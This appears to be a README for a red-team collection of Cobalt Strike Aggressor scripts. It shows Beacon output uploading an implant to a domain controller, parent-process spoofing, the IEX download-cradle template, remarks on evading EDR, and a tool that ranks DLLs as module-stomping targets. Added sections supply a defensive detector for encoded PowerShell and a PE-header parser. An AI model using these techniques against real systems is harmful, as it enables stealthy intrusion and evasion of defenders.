cobalt-arsenal

My published set of Aggressor Scripts for Cobalt Strike 4.0+

beacon> upload implant.exe \\DC1\c$\windows\temp\implant.exe
[*] Tasked Beacon to upload file (size: 929.25KB, md5: 6465bb8a4af8dd2d93f8f386a16be341) from: (implant.exe) to: (\\DC1\c$\windows\temp\implant.exe)
[+] host called home, sent: 951655 bytes

		set POWERSHELL_DOWNLOAD_CRADLE {
			return "IEX (New-Object Net.Webclient).DownloadString(' $+ $1 $+ ')";
		}
		[...]

		set POWERSHELL_COMMAND {
		[...]
			return "powershell -nop -w hidden -encodedcommand $script";
		}

The methods above are heavily flagged these days by EDRs and AVs, so we would prefer to avoid their use. It so happens that Cobalt Strike by default embeds them excessively, generating a lot of noise in such systems. We can tell Cobalt Strike to structure its PowerShell use patterns differently. However, some of the introduced custom methods may not work. In such situations, we can always switch back to the battle-tested Cobalt Strike defaults by setting $USE_UNSAFE_ENCODEDCOMMAND_AND_IEX = 2; in the script's header.
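The flip side of the two defaults quoted above is how a defender recognises them in process telemetry. The following is an added example, not part of cobalt-arsenal or of Cobalt Strike: a small Python checker that decodes the base64/UTF-16LE payload behind -encodedcommand (and its accepted abbreviations) and tags command lines that carry the IEX download cradle, a hidden window or the no-profile switch. The three command lines and the example.invalid URL are constructed sample input, not captured from a real host.

```python
import base64
import re
from typing import Optional

# Signatures for the two Cobalt Strike defaults quoted above: the IEX download
# cradle and "powershell -nop -w hidden -encodedcommand <base64>".
# PowerShell accepts abbreviated switches, so the flag patterns accept the short forms too.
CRADLE_RE = re.compile(r"\bIEX\b.*New-Object\s+Net\.WebClient.*DownloadString", re.I)
ENCODED_FLAG_RE = re.compile(r"^-(?:e|ec|en|enc|encodedcommand)$", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
NOPROFILE_RE = re.compile(r"-nop\b|-noprofile\b", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE text), or None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if ENCODED_FLAG_RE.match(flag):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def inspect_command_line(cmdline: str) -> dict:
    """Classify one process command line; the findings are tags a detection rule can key on."""
    findings = []
    decoded = decode_encoded_command(cmdline) if "powershell" in cmdline.lower() else None
    if decoded is not None:
        findings.append("encoded-command")
    if HIDDEN_RE.search(cmdline):
        findings.append("hidden-window")
    if NOPROFILE_RE.search(cmdline):
        findings.append("no-profile")
    # Look for the cradle both in the clear and inside the decoded payload.
    for text, origin in ((cmdline, "cmdline"), (decoded or "", "decoded")):
        if CRADLE_RE.search(text):
            findings.append(f"download-cradle:{origin}")
    return {"cmdline": cmdline, "decoded": decoded, "findings": findings}


def is_suspicious(result: dict) -> bool:
    """Hidden window / no-profile alone are common in admin scripts; the cradle or an
    encoded payload is what makes the line worth an alert."""
    return any(t == "encoded-command" or t.startswith("download-cradle") for t in result["findings"])


def scan(command_lines) -> list:
    """Return the inspection results for command lines that deserve an alert."""
    return [r for r in (inspect_command_line(c) for c in command_lines) if is_suspicious(r)]


def encode_sample(script: str) -> str:
    """Produce the base64/UTF-16LE form -EncodedCommand expects; used here only to build sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not captured from a real host); the URL is a placeholder.
SAMPLE_CRADLE = "IEX (New-Object Net.Webclient).DownloadString('http://example.invalid/a')"
SAMPLE_COMMAND_LINES = [
    f'powershell -nop -w hidden -c "{SAMPLE_CRADLE}"',                    # cradle in the clear
    "powershell -nop -w hidden -encodedcommand " + encode_sample(SAMPLE_CRADLE),  # same, encoded
    "powershell -NoProfile -Command Get-Service",                          # benign admin usage
]

if __name__ == "__main__":
    for result in scan(SAMPLE_COMMAND_LINES):
        print(result["findings"], "<-", result["cmdline"][:72])
```

In practice the input would be the command-line field of process-creation telemetry (Sysmon event 1 or Windows 4688 with command-line auditing enabled); the benign third line shows why `no-profile` on its own is kept as context rather than an alert.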

FilesColor example

The same command is also exposed as an alias:

beacon> autoppid
[*] Tasked Beacon to find svchost.exe running as SYSTEM and make it the PPID.
[.] host called home, sent: 12 bytes
Future post-ex jobs will be spawned with fake PPID set to:
	svchost.exe	604	700	x64	NT AUTHORITY\SYSTEM	0

[*] Tasked beacon to spoof 700 as parent process
[.] host called home, sent: 12 bytes

Help:

PS C:\> py .\stomp-dll-info.py --help

    :: stomp-dll-info.py - Your Module Stomping / DLL Hollowing candidates headhunter!
    A script that scans, filters, analyzes DLL files displaying viable candidates for module stomping.

    Mariusz Banach / mgeeky, '21
    <mb [at] binary-offensive.com>

usage: .\stomp-dll-info.py [options] <path>

positional arguments:
  path                  Path to a DLL/directory.

optional arguments:
  -h, --help            show this help message and exit
  -r, --recurse         If <path> is a directory, perform recursive scan.
  -v, --verbose         Verbose mode.

Output sorting:
  -a, --ascending       Sort in ascending order instead of default of descending.
  -c COLUMN, --column COLUMN
                        Sort by this column name. Default: filename. Available columns: "type", "filename", "file size", "image size", "code size", "hollow size", ".NET", "signed", "in System32", "in SysWOW64", "used by", "path"
  -n NUM, --first NUM   Show only first N results, as specified in this parameter. By default will show all candidates.

Output filtering:
  -C CODESIZE, --min-code-size CODESIZE
                        Show only modules with code section bigger than this value.
  -I IMAGESIZE, --min-image-size IMAGESIZE
                        Show only modules whose images are bigger than this value.
  -E HOLLOWSIZE, --hollow-size HOLLOWSIZE
                        Show only modules with enough room to fit shellcode in Module Stomping / DLL Hollowing technique. Example Beacon size requirement: 300KB (307200).
  -S SIZE, --min-file-size SIZE
                        Show only modules of size bigger than this value. Cobalt Strike c2lint complains when module stomping target is smaller than 23MB (24117248).
  -P NAME, --process NAME
                        Show only modules that are used by this process.
  -U, --used            Show only modules that are used by any process in the system.
  -Q, --not-used        Show only modules that are NOT used by any process in the system.
  -D, --dotnet          Show only modules that are .NET assemblies.
  -G, --signed          Show only code signed modules.
  -H, --unsigned        Show only unsigned modules.
  -W, --system-cross-arch
                        Show only modules that are present in both System32 and SysWOW64 directories.

Example usage:

PS C:\> py stomp-dll-info.py C:\Windows\System32 -c 'hollow size' -W -E 307200 -n 20

    :: stomp-dll-info.py - Your Module Stomping / DLL Hollowing candidates headhunter!
    A script that scans, filters, analyzes DLL files displaying viable candidates for module stomping.

    Mariusz Banach / mgeeky, '21
    <mb [at] binary-offensive.com>

+----+------+----------------------------------------+-----------+------------+-----------+---------------+-------+-----------------------+-------------+-------------+------------------------------------------+------------------------------------------+
| #  | type |                filename                | file size | image size | code size | ▼ hollow size | .NET  |        signed         | in System32 | in SysWOW64 |                 used by                  |                   path                   |
+----+------+----------------------------------------+-----------+------------+-----------+---------------+-------+-----------------------+-------------+-------------+------------------------------------------+------------------------------------------+
| 0  | dll  |               mshtml.dll               | 23447040  |  23552000  | 16574643  |   14951811    | False |       Unsigned        |    True     |    True     |                                          |      C:\Windows\System32\mshtml.dll      |
| 1  | dll  |              edgehtml.dll              | 26269184  |  26406912  | 18349083  |   12778123    | False |       Unsigned        |    True     |    True     |              SearchApp.exe               |     C:\Windows\System32\edgehtml.dll     |
| 2  | dll  |          Windows.UI.Xaml.dll           | 17539584  |  17567744  | 12105148  |    8655164    | False |       Unsigned        |    True     |    True     |  SystemSettings.exe, TextInputHost.exe,  | C:\Windows\System32\Windows.UI.Xaml.dll  |
|    |      |                                        |           |            |           |               |       |                       |             |             |      explorer.exe, Calculator.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |      SearchApp.exe, onenoteim.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |       StartMenuExperienceHost.exe,       |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |  Video.UI.exe, ShellExperienceHost.exe,  |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |           WindowsTerminal.exe,           |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |    Microsoft.Photos.exe, LockApp.exe,    |                                          |
|    |      |                                        |           |            |           |               |       |                       |             |             |              YourPhone.exe               |                                          |
| 3  | dll  |                wmp.dll                 | 11500544  |  11587584  |  8181400  |    6644984    | False |       Unsigned        |    True     |    True     |                                          |       C:\Windows\System32\wmp.dll        |
| 4  | dll  | Windows.Media.Protection.PlayReady.dll | 10352400  |  10309632  |  7175422  |    6218542    | False | Microsoft Corporation |    True     |    True     |                                          | C:\Windows\System32\Windows.Media.Protec |

[...]
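To make the table's columns concrete, here is an added example that is not stomp-dll-info.py's own code: a standard-library-only PE header parser that reports the fields behind "image size" (SizeOfImage), "code size" (bytes in executable sections), "signed" (a non-empty Authenticode certificate directory) and ".NET" (a CLR runtime header), plus a filter mirroring the tool's -C switch. The "hollow size" formula is not documented on this page and is therefore not reproduced. The input is a constructed, headers-only PE32+ image built by build_sample_pe, not a real DLL, so the section layout and sizes are invented for the demonstration.

```python
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
DIR_SECURITY = 4   # data directory 4: Authenticode certificate table
DIR_CLR = 14       # data directory 14: CLR header, present only in .NET assemblies
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data: bytes) -> dict:
    """Read the PE headers and return the fields behind the table's columns."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    if magic == 0x20B:      # PE32+: data directories start 112 bytes into the optional header
        arch, dirs_off = "x64", opt_off + 112
    elif magic == 0x10B:    # PE32: they start at offset 96
        arch, dirs_off = "x86", opt_off + 96
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    image_size = struct.unpack_from("<I", data, opt_off + 56)[0]   # SizeOfImage

    def directory_size(index: int) -> int:
        return struct.unpack_from("<II", data, dirs_off + 8 * index)[1]

    sections, code_size = [], 0
    for i in range(nsections):
        name, vsize, rva, _, _, _, _, _, _, chars = SECTION_HDR.unpack_from(
            data, opt_off + opt_size + 40 * i)
        executable = bool(chars & (IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE))
        code_size += vsize if executable else 0   # "code size": bytes in executable sections
        sections.append({"name": name.rstrip(b"\0").decode(), "virtual_size": vsize,
                         "rva": rva, "executable": executable})
    return {"arch": arch, "image_size": image_size, "code_size": code_size,
            "signed": directory_size(DIR_SECURITY) > 0,
            "dotnet": directory_size(DIR_CLR) > 0, "sections": sections}


def build_sample_pe(sections: list, signed: bool = False, dotnet: bool = False) -> bytes:
    """Construct a headers-only PE32+ image so the parser can be exercised offline (not a real DLL)."""
    section_align, file_align = 0x1000, 0x200
    headers_size = -(-(64 + 4 + 20 + 240 + 40 * len(sections)) // file_align) * file_align
    sec_hdrs, rva = b"", 0x1000
    for name, vsize, chars in sections:
        sec_hdrs += SECTION_HDR.pack(name.ljust(8, b"\0"), vsize, rva, 0, 0, 0, 0, 0, 0, chars)
        rva += -(-vsize // section_align) * section_align   # rva ends up equal to SizeOfImage
    dirs = [(0, 0)] * 16
    if signed:
        dirs[DIR_SECURITY] = (headers_size, 0x800)   # pretend certificate table after the headers
    if dotnet:
        dirs[DIR_CLR] = (0x2000, 72)                 # pretend CLR header
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII",
                      0x20B, 14, 0, 0, 0, 0, 0x1000, 0x1000, 0x180000000,
                      section_align, file_align, 6, 0, 0, 0, 6, 0,
                      0, rva, headers_size, 0, 2, 0x160,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, len(opt), 0x2022)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)      # e_lfanew = 64
    return dos + b"PE\0\0" + coff + opt + sec_hdrs


# Constructed section layout resembling a mid-sized DLL (not taken from any real file).
SAMPLE_SECTIONS = [
    (b".text",  0x20000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | 0x40000000),
    (b".rdata", 0x8000,  0x40000040),
    (b".data",  0x2000,  0xC0000040),
    (b".reloc", 0x1000,  0x42000040),
]


def candidate_report(images: dict, min_code_size: int = 0) -> list:
    """Apply a -C style filter (code section bigger than the threshold) and return one row per survivor."""
    rows = []
    for path, data in images.items():
        info = parse_pe(data)
        if info["code_size"] > min_code_size:
            rows.append({"path": path, **{k: info[k] for k in
                         ("arch", "image_size", "code_size", "signed", "dotnet")}})
    return sorted(rows, key=lambda r: r["code_size"], reverse=True)


if __name__ == "__main__":
    images = {"signed.dll": build_sample_pe(SAMPLE_SECTIONS, signed=True),
              "managed.dll": build_sample_pe(SAMPLE_SECTIONS[:2], dotnet=True)}
    for row in candidate_report(images, min_code_size=0x10000):
        print(row)
```

Pointing parse_pe at real files from System32 reproduces the size and signature columns from the headers alone; note that the "signed" column here only checks that a certificate table exists, it does not validate the signature, which is what a reviewer would still do with signtool or Get-AuthenticodeSignature.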

☕ Show Support ☕

This and other projects are the outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, consider buying me a coffee (or better a beer) just to say thank you! 💪


Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com>